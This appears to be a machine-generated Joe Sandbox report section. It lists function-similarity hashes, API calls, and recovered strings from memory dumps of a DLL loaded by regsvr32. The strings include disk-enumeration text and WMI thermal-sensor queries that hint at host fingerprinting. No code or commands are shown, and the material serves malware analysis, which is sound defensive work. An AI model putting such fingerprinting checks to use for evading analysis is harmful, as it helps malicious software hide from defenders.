                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .Components$assertion failed: is_code_point_boundary(self, new_len)$exe\\.\NULexit code:
                                                                                • API String ID: 0-953524122
                                                                                • Opcode ID: 4bf10cf74353f0c97a8e8baba906ba07b86fdc5e05112f3ed4619756ac11ecf1
                                                                                • Instruction ID: 6de9452d63790a8c23cde56d4476a5992e6fffd71e4330fa9e7b34b3ef707233
                                                                                • Opcode Fuzzy Hash: 4bf10cf74353f0c97a8e8baba906ba07b86fdc5e05112f3ed4619756ac11ecf1
                                                                                • Instruction Fuzzy Hash: F5B1D0A1F09A6385FFB48FB2D8403B926A5AF05BD8F548435DE2D57785EE3EE5418300
                                                                                APIs
                                                                                Strings
                                                                                • internal error: entered unreachable codeC:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\rayon-core-1.12.1\src\job.rs, xrefs: 00007FFB9901A4A3, 00007FFB9901A5E3, 00007FFB9901A762
                                                                                • cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs, xrefs: 00007FFB9901A4DE
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs$internal error: entered unreachable codeC:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\rayon-core-1.12.1\src\job.rs
                                                                                • API String ID: 3510742995-1353005617
                                                                                • Opcode ID: a36f195349272817425be8c32bb199ee20960e7abfcb82e78716dc043bb37a84
                                                                                • Instruction ID: 6af00787f3e4a34e7dea18111da4e77dccc7cd2748dab97abbd1f9a36b0eadfb
                                                                                • Opcode Fuzzy Hash: a36f195349272817425be8c32bb199ee20960e7abfcb82e78716dc043bb37a84
                                                                                • Instruction Fuzzy Hash: E7B13C6290CBC691E6B29F28E4413EAB3A4FF99744F449121DFDC02656EF3CE699C701
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep_execute_onexit_table
                                                                                • String ID:
                                                                                • API String ID: 1009545205-0
                                                                                • Opcode ID: df51d5d6e1c4c7b57b81fbf63dc057098b287d072b406a62ff6c2fe88d321c12
                                                                                • Instruction ID: 0b0ef808478c001f5b01a998745a173fc22ef8eed565ae7ffafec55cc3e9d59a
                                                                                • Opcode Fuzzy Hash: df51d5d6e1c4c7b57b81fbf63dc057098b287d072b406a62ff6c2fe88d321c12
                                                                                • Instruction Fuzzy Hash: 2C71B1B1E0825345F7B69F77E94077A62A4BF45BC0FA45831DE0C87791EE3CE9829218
                                                                                APIs
                                                                                Strings
                                                                                • attempt to join into collection with len > usize::MAX/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\str.rs, xrefs: 00007FFB98FF96E6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: attempt to join into collection with len > usize::MAX/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\str.rs
                                                                                • API String ID: 3510742995-1099963043
                                                                                • Opcode ID: 134ece1675c8e8e29816a76501063112e23bf949911f785582f2ed68d226f113
                                                                                • Instruction ID: d9121028996952c374552619a7e89d0146b8d2b56fb393f4ef40eea6ceea46e4
                                                                                • Opcode Fuzzy Hash: 134ece1675c8e8e29816a76501063112e23bf949911f785582f2ed68d226f113
                                                                                • Instruction Fuzzy Hash: F561B5B2B08B8281EA60CB25E4403AAB7A1FB85BD8F949531EE5D43B95DF3CE145C704
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle$ObjectSingleSleepWait
                                                                                • String ID:
                                                                                • API String ID: 2593906732-0
                                                                                • Opcode ID: acc05fc114a6afa6c89adaa132b757eb8ebe26bee863b86785b4313ed65abd39
                                                                                • Instruction ID: ab7ffff0fe8f69a9304d6f8c3a68b821d70fea934876757e5f826a43fc86d723
                                                                                • Opcode Fuzzy Hash: acc05fc114a6afa6c89adaa132b757eb8ebe26bee863b86785b4313ed65abd39
                                                                                • Instruction Fuzzy Hash: 9021F496F0A60312FEB89E75E91637946569F853B0E08D230DE3E867E5DD3DE8018240
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Value$PrngProcessVersionmemset
                                                                                • String ID:
                                                                                • API String ID: 1585940240-0
                                                                                • Opcode ID: 3c550410f0edefc9c4c64c1c23e2ac0307e71bd014fd8453c883811e3d130fd9
                                                                                • Instruction ID: 9331af453c31f878d6645c874ddfb5f8d7fdcdc43da5054ca38f532522eafecc
                                                                                • Opcode Fuzzy Hash: 3c550410f0edefc9c4c64c1c23e2ac0307e71bd014fd8453c883811e3d130fd9
                                                                                • Instruction Fuzzy Hash: CD2138B1E0969741FA750B39C1057BD5790AF88B80FA9A530EE8C0B7C1DF2DE9828304
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: ClearVariant
                                                                                • String ID: CriticalTripPoint$CurrentTemperature
                                                                                • API String ID: 1473721057-3920528518
                                                                                • Opcode ID: d2ef15b10033a7d13c3b972bbe0cb5b07435e5ecb743a28238452877cbbaac7e
                                                                                • Instruction ID: ca3ad5c115a8cbb00cbcf3aae1b2c251bd1b942872878b60cecde4bb555d3c7d
                                                                                • Opcode Fuzzy Hash: d2ef15b10033a7d13c3b972bbe0cb5b07435e5ecb743a28238452877cbbaac7e
                                                                                • Instruction Fuzzy Hash: 05814472A1CA8286F7F09F39E4513AAA3A0FF86344F544135E69D42A95EF7DE5C4CB00
                                                                                APIs
                                                                                Strings
                                                                                • HDDSSDUnknownnoyesDisk()[FS: ][Type: ][removable: ] mounted on : / B, xrefs: 00007FFB990051BD
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: ConvertErrorFreeLastLocalString
                                                                                • String ID: HDDSSDUnknownnoyesDisk()[FS: ][Type: ][removable: ] mounted on : / B
                                                                                • API String ID: 3685928780-2195794605
                                                                                • Opcode ID: 60a67b539aeef52074a088f9c3334d8b07d403f2b0bfb5e2f0fb73275f70c241
                                                                                • Instruction ID: a5f978bbc320bd7a9142c69856195a1e2d0e162c3664efe94e4dede11164ab55
                                                                                • Opcode Fuzzy Hash: 60a67b539aeef52074a088f9c3334d8b07d403f2b0bfb5e2f0fb73275f70c241
                                                                                • Instruction Fuzzy Hash: F35151B2A1CB8291EAB09F25F4513AAB764FB81784F505031EA9D47A69EF3CD145CB00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID:
                                                                                • API String ID: 3510742995-0
                                                                                • Opcode ID: 907ed15f83dbd4b7fe5550b04edfb633e21df681a76d593f6c88d92e9cf8fe1b
                                                                                • Instruction ID: ea58342616b916336e21e324ec2b08a091e14cba873b0ff943f8bafd2f745183
                                                                                • Opcode Fuzzy Hash: 907ed15f83dbd4b7fe5550b04edfb633e21df681a76d593f6c88d92e9cf8fe1b
                                                                                • Instruction Fuzzy Hash: 4BA18076A09BD185E6618F26E4143ABBBA4FB89BC4F545026EEDC03765DF3DD181CB00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID:
                                                                                • API String ID: 3702945584-0
                                                                                • Opcode ID: 92b4f54cbe8f68d83b097886e055e22686cba5b4e921202a88b12db328f1a14d
                                                                                • Instruction ID: 5955d48aab19248266aa58ce9cfb7e895fc0dac07bd3ab7c95000af03ca0797b
                                                                                • Opcode Fuzzy Hash: 92b4f54cbe8f68d83b097886e055e22686cba5b4e921202a88b12db328f1a14d
                                                                                • Instruction Fuzzy Hash: 5D917B61918AC291F7B28B29E0063F9A7A0FF94754F049231EADC03765EF79E5D68740
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$ErrorHandleLast
                                                                                • String ID:
                                                                                • API String ID: 3844782297-0
                                                                                • Opcode ID: b4ab4f8a21ef303af1d75352173f6bae9ce8ff443c9bca7ab7fe9f73c1173003
                                                                                • Instruction ID: 6c0d57727b2778f81a4511de8153130a0798eb3b23c46c537c1abf8ee3d6f3ad
                                                                                • Opcode Fuzzy Hash: b4ab4f8a21ef303af1d75352173f6bae9ce8ff443c9bca7ab7fe9f73c1173003
                                                                                • Instruction Fuzzy Hash: E621F3C2B0A5D256FAB99E7ADA047F54A116F56BE0F198230DF7C47BC1D92CD5938300